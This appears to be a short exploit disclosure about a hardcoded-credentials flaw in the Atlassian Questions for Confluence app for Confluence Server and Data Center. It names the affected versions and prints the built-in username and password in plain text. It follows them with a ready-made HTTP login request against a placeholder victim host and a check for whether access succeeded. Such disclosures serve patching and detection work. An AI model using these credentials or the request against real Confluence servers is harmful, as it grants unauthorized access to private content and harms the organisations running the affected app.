The Atlassian Questions For Confluence app for Confluence Server and Data Center
creates a Confluence user account in the confluence-users group with
the username disabledsystemuser and a hardcoded password. A remote,
unauthenticated attacker with knowledge of the hardcoded password could
exploit this to log into Confluence and access all content accessible
to users in the confluence-users group.
This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.
Hardcoded Credentials:
- User:
disabledsystemuser - Password:
disabled1system1user6708
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded
os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action
If the server redirects to /vulnerable.action, credentials are valid.
The hardcoded credential were plainly laying inside the jar files of the affected plugin
https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar